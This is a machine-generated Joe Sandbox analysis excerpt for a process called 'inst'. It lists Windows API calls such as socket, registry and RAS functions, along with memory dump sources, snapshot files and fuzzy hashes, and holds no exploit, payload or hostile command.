                                                                                                                                                                      • Instruction ID: 494f3326b735ab9069db5c32ca0e69b9ee158f12d46bd8cd484fc194616b1297
                                                                                                                                                                      • Opcode Fuzzy Hash: f4f2d0d32c541e3af3d6718a308c0d75bd95a346eed3d1e97d580e36d8304156
                                                                                                                                                                      • Instruction Fuzzy Hash: 68218631500709AFCF35EF14C984AAABBF5EB48300F20491AF857936A0C331EA848F91
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 5F522243: _memset.LIBCMT ref: 5F522280
                                                                                                                                                                        • Part of subcall function 5F522243: _strcat.LIBCMT ref: 5F52228A
                                                                                                                                                                        • Part of subcall function 5F522243: __wcstoi64.LIBCMT ref: 5F5222AE
                                                                                                                                                                        • Part of subcall function 5F528425: _malloc.LIBCMT ref: 5F52843F
                                                                                                                                                                      • htonl.WS2_32(?), ref: 5F522617
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __wcstoi64_malloc_memset_strcathtonl
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2862793191-0
                                                                                                                                                                      • Opcode ID: ef4d60983490f399362d8605afea76583426b3f638859e89317ea6d2a09efd01
                                                                                                                                                                      • Instruction ID: 23fa49848d0c826fd4f0013a327e90f87bc06bdc64e4eba6eac486121a952fa4
                                                                                                                                                                      • Opcode Fuzzy Hash: ef4d60983490f399362d8605afea76583426b3f638859e89317ea6d2a09efd01
                                                                                                                                                                      • Instruction Fuzzy Hash: 8F11B2B6103711BEF3649FB8E800B9B77D4AB48720F60033AEA08DB1D0DEA1A90083C5
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                                                      • Opcode ID: 1e8c591ce45972c734cffb2b6b836b4c0822c0cf04ce7fa5f223d233c2a7b32b
                                                                                                                                                                      • Instruction ID: 1bb305415699e30cbcd3fd193866adf929ad03b3fdff1923f810ce8fe2d38214
                                                                                                                                                                      • Opcode Fuzzy Hash: 1e8c591ce45972c734cffb2b6b836b4c0822c0cf04ce7fa5f223d233c2a7b32b
                                                                                                                                                                      • Instruction Fuzzy Hash: 3411B47550211DABEF15CF64CC40EEF7BF9AF55200F0442EBE509A7280DE319A54CBA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001AEB38
                                                                                                                                                                        • Part of subcall function 001E5546: _malloc.LIBCMT ref: 001E5560
                                                                                                                                                                        • Part of subcall function 001AE1E2: __EH_prolog3.LIBCMT ref: 001AE1E9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3$_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1683881009-0
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0016E080: GetCurrentProcessId.KERNEL32 ref: 0016E084
                                                                                                                                                                        • Part of subcall function 0016E080: CreateFileW.KERNEL32 ref: 0016E0AA
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,06AC2023,?,00000000,?,?,00000000,0021D2E0,000000FF,?,0016B43F,?), ref: 0016E465
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CreateCurrentExistsPathProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3040742104-0
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 001DF9AF: EnterCriticalSection.KERNEL32(0024CD40,00000000,?,?,0016DA81,00000000,?,?,?,?,0016B6E0,?,00000000,?,?), ref: 001DF9BC
                                                                                                                                                                        • Part of subcall function 001DF9AF: LeaveCriticalSection.KERNEL32(0024CD40,0016B364,?,0016DA81,00000000,?,?,?,?,0016B6E0,?,00000000,?,?), ref: 001DF9D8
                                                                                                                                                                      • FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,0016B6E0,?,00000000,?,?), ref: 0016DAA6
                                                                                                                                                                        • Part of subcall function 0016DC40: LoadResource.KERNEL32(0016B364,0021CD88,00000000,?,0016DAB8,00000000,00000000,?,?,00000000,00000000,?,?,?,?,0016B6E0), ref: 0016DC4C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalResourceSection$EnterFindLeaveLoad
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1986744039-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001AEBE1
                                                                                                                                                                        • Part of subcall function 001ADE99: __EH_prolog3.LIBCMT ref: 001ADEA0
                                                                                                                                                                        • Part of subcall function 001AEB31: __EH_prolog3.LIBCMT ref: 001AEB38
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001B62D1
                                                                                                                                                                        • Part of subcall function 00186986: _wcschr.LIBCMT ref: 001869AB
                                                                                                                                                                        • Part of subcall function 001B5F4D: __EH_prolog3_GS.LIBCMT ref: 001B5F54
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3H_prolog3__wcschr
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4028972141-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00184BC2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2882836952-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(5F5BC3F0,000004CC,00000000,00000001), ref: 5F51C7E1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 5F5221AC: socket.WS2_32(00000002,00000002,00000011), ref: 5F5221C3
                                                                                                                                                                        • Part of subcall function 5F5221AC: _memset.LIBCMT ref: 5F5221DB
                                                                                                                                                                        • Part of subcall function 5F5221AC: htonl.WS2_32(00000000), ref: 5F5221F2
                                                                                                                                                                        • Part of subcall function 5F5221AC: htons.WS2_32(?), ref: 5F5221FA
                                                                                                                                                                        • Part of subcall function 5F5221AC: htonl.WS2_32(0100007F), ref: 5F522216
                                                                                                                                                                        • Part of subcall function 5F5221AC: bind.WS2_32(00000000,?,00000010), ref: 5F522222
                                                                                                                                                                      • closesocket.WS2_32(?), ref: 5F522693
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: htonl$_memsetbindclosesockethtonssocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 95467627-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __lock_file.LIBCMT ref: 001EF4F9
                                                                                                                                                                        • Part of subcall function 001E98D1: __getptd_noexit.LIBCMT ref: 001E98D1
                                                                                                                                                                        • Part of subcall function 001EA5B1: __decode_pointer.LIBCMT ref: 001EA5BC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __decode_pointer__getptd_noexit__lock_file
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3158947991-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4E7DCA
                                                                                                                                                                        • Part of subcall function 5F5131EC: _memset.LIBCMT ref: 5F513151
                                                                                                                                                                        • Part of subcall function 5F5131EC: RasEnumConnectionsW.RASAPI32(?,?,?), ref: 5F51317C
                                                                                                                                                                        • Part of subcall function 5F5131EC: _memset.LIBCMT ref: 5F51319B
                                                                                                                                                                        • Part of subcall function 5F5131EC: RasGetConnectStatusW.RASAPI32(?,?), ref: 5F5131B0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$ConnectConnectionsEnumStatus
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3492228599-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::_String_base::_Xlen.LIBCPMT ref: 5F4D8B1A
                                                                                                                                                                        • Part of subcall function 5F541FB5: __EH_prolog3.LIBCMT ref: 5F541FBC
                                                                                                                                                                        • Part of subcall function 5F541FB5: __CxxThrowException@8.LIBCMT ref: 5F541FE7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception@8H_prolog3String_base::_ThrowXlenstd::_
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1675473389-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 001A236A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClientRect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 846599473-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegCreateKeyExW.KERNEL32(?,?,00000000,?,?,?,?,00000000,?), ref: 00178967
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Create
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,?), ref: 001B56A2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LongWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1378638983-0
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 5F528425: _malloc.LIBCMT ref: 5F52843F
                                                                                                                                                                      • PostMessageW.USER32(5F5BC3F0,000004CB,00000000,00000001), ref: 5F51C839
                                                                                                                                                                        • Part of subcall function 5F51C522: _memset.LIBCMT ref: 5F51C530
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost_malloc_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2839725968-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001AF083
                                                                                                                                                                        • Part of subcall function 001AEF1E: __EH_prolog3.LIBCMT ref: 001AEF25
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 5F528425: _malloc.LIBCMT ref: 5F52843F
                                                                                                                                                                      • PostMessageW.USER32(5F5BC3F0,000004CD,00000000,00000001), ref: 5F51C776
                                                                                                                                                                        • Part of subcall function 5F51C522: _memset.LIBCMT ref: 5F51C530
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost_malloc_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2839725968-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,5F4F5BD5,customproxytype,?,FF4173A1), ref: 5F516C13
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: QueryValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3660427363-0
                                                                                                                                                                      • Opcode ID: 4ab598b453c1cf5901ce718a6f9bd654490634c60baf5d7b91e665fa523f3560
                                                                                                                                                                      • Instruction ID: 8193370e37f10e5c32041684da301b3156773ac45b612a90b598413bcfd2c33a
                                                                                                                                                                      • Opcode Fuzzy Hash: 4ab598b453c1cf5901ce718a6f9bd654490634c60baf5d7b91e665fa523f3560
                                                                                                                                                                      • Instruction Fuzzy Hash: D5F0FEB6610205FBEB09DFA4C844FDA7BA8EB04358F00852CBD46D7280E670F648CA60
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00181634
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2882836952-0
